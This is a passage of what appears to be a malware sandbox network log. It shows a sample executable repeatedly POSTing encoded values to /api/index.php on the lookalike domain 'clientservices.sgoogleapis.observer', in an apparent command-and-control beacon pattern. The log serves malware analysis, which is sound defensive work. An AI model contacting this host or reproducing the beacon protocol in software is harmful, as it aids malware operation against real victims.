Jan 8, 2025 08:46:25.904767036 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:26.540175915 CET	827	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BTLZPlKAVPGFf3VfqoHKpnT%2BZW1YNM%2BqgMXsVm5E7JufqbXn78YVpTWUyCWZ%2BwTFadE5pFZmUVWQ21o6oIDMcwRQ84TUQulqvqjNpcyzR4DXluO6kHjU3McR%2BwPYJkX8z1ud8up9OjaCF5FQ0UQ%2BdCYjFe1DQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92e26c6643ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1784&rtt_var=892&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50043	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:28.201379061 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:28.848458052 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6br0uUyJZlBG24xBn2jPw0nqx8Gjz1UhtoU1Xv5LvRQQSql8pM5mxHbI70kn1Lp%2FiF8LX2h%2B9TZ6HfQhndawrUSUDqHifBLuB0PzuIOISQHab1jfgTqo2Knh92tmpPbVk9nI04eZEODafbeQsuqj0I9Hp%2FY1hQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92f0daf08c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1888&rtt_var=944&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50044	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:30.360249996 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:31.007652998 CET	827	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vz%2Fjw4bOibf2Bebtc%2BScJuvJ4rK%2BcfK8sAlYN9m%2BcmXK7WTExo6hCm7l5eWq8fObxZx4KWQM1JntfjBOJpMXBvnS7hoTXRVGs438Ls3XBL3xY3x8YV9em4YyY%2BO3aLlmipaSEGposy0e%2B0s8eAPniDbtOYTi4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92fe590d42d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=756&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50045	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:32.735523939 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:33.283407927 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SvYBNezjy6CFZDIatxfsX5422z8Xzzw1N9ffzLJnWednqwMliWfPviH3%2BpDM7G4wJd0y2Rkl7YG7vhQ7Q0WEtGTaP1mNEXcR%2B0SbzNaZNDWjO7iskmIHZPpQOKMiXyq9EFMJOdA5vJTwj0Aog3lke2B63J31mQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea930d28657d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1947&rtt_var=973&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50046	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:34.796565056 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:35.449184895 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xE0lfevhL4HrXqpxtqibluWLunpLtxvdSf6FC%2FVs9aSXfr4UV4WDhxd2nrHpI4Epho91r9xACWyZi6415nYM461CHr4Xlx2ZhG7lf%2FsdaTQX0Neo3yJMGUuv0AiT7eVvd0xCZZVwQ%2FhEOOp3YVPY5dThnG%2BTcQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea931a1df743ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1823&rtt_var=911&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	50047	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:37.124619961 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:37.860440969 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85TkBxK%2FUMBYeHfxllZpjYPuyPWVn38%2FZKSqXYaVJKYWVAUzueYFHaSs32uiA8YSgBgben6LYzIwZyPGkuSpTX4iwnSts6rXPM5jb3sl%2FD4u3YKhEHhWyIDR0683AjjxbH9kPsDkpJJPCrZDowlnlbJJBXtG4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9328a89d8c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1974&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	50048	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:39.386770010 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:40.013513088 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c09T6%2FkuRBHbSPJdJJuFI%2BMLrGRWhiM%2F6X0fK50m%2FpZHNzAuMeOZX6O%2FX9ukqIRh7yNSMgOp3pD5Z8nTCnfG5iDKcJsAQ7lmKV3qbVghNspmITsoh9XhyKwiu8HFzrbd64vuc462UeJBGrYPsXQR7hytMmZWlg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea93369d8a7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	50049	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:41.639642954 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:42.269740105 CET	820	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ByUIYbOqMdx95Hos8IgSBMtJvjIICifyDuCAMk7Xeeq0sXWlih9KCwgH2iHwW%2FhU2On52Kt9X5MoDwi8V%2FBXygAEUJyTPTox%2B7U5uBJIjXdHM%2Bs8rFl7IOeqWPDMfy5Unx4Lhc24qL2Gn5P7M%2FpferGumFSOYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9344c8ab7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2267&min_rtt=2267&rtt_var=1133&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	50050	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:43.862874031 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:44.462680101 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1NK9G8Cd0UT1ezn%2Bm5PK3rAan%2FHohK6OWj4Wk36xKcfE61gyxSdy283gshMgAoTV9hf4H4Qw6B3rwHwtBOqFsJPNC8h1h9%2BjkuXTu1yYRnmr6RwLCwz1vsfhRIM8vYUsqlJedUWUsUHC%2BJO9GEfdIX6Etbq4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea93526baa7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1938&rtt_var=969&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50051	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:46.124140024 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:46.756897926 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cKGSlf1GmdViD6mBRbBet6GvCBRiydA%2BDw1Z1w%2BqrCYbZQKOmiKGeQIbduGvFUro3TMLU8BKa4aY6VB3UAQ%2BnmnQ8vU30QlBzGUUK3D3BYId0HsLiHBPzpb82L4bpB66W6p0hyIR%2Blqt28Rj5wJ9xa0MFrQ3rA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9360c8a3c443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50052	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:48.280689955 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:48.954159021 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FDSKwfVogbQv83Zy1IIfAi%2FqUbYcns8tylQGrb7Xq0gGtUIwtlFuvnW5LANT5Vzuo%2Fv3ERVzuHHGblMnGVRDWsTkXg2RMvF9ez5Yznvst567D5Dmem%2F6tf1i6PgvpZ2X60E2ix18TnLXxgxzumg2gwhq%2BuoNpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea936e4877c443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	50053	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:50.593051910 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:51.148322105 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo1kD4VQsIlGfu0jbxpDZVBhpO9zWEJn30qnYoSjKkqt6rBy4MKjJ21dcBXU5506zFAQ1tTgIeuXTNSqGB8cCNR65C3g87Q5JMPHJjCkgathVxXad%2BJDKbaxmyi%2BQ9JTQf70%2FXvc76vpZEflecbgYOdGGXAwBA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea937ccbb58c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1952&rtt_var=976&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50054	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:52.692282915 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:53.322114944 CET	819	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLDj8shjNrMySbPm8e1QsAvhezEkTvcZRojLWeIh%2BH9MJxXq8JbFPRefP70KQf5aVzmMu1Ya7cltIw64A7CFBDTjNp2KRYDhQCfCGKoykC57n10jQfdRScoQN5jfqrMyeftyvL%2FREr3P5VhuCy5BWrpJLFp9tA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9389da8c7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1927&min_rtt=1927&rtt_var=963&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50055	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:55.013951063 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:55.671662092 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWL6fSRBqYJWRsj4J17eCMPVskdBnGza3TqtWBssb1SUxeN%2Ba6B82D1cim1vQWUSm3KL3d2cv4yLv6dB2dDw2flHzwl93mUrWU1EzC%2BrIDKm7qDopAutVQ1BQS%2B10kgt3v2ISqcN70Fip9YeNxFOnH13ItUEuA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9398794b43ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50056	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
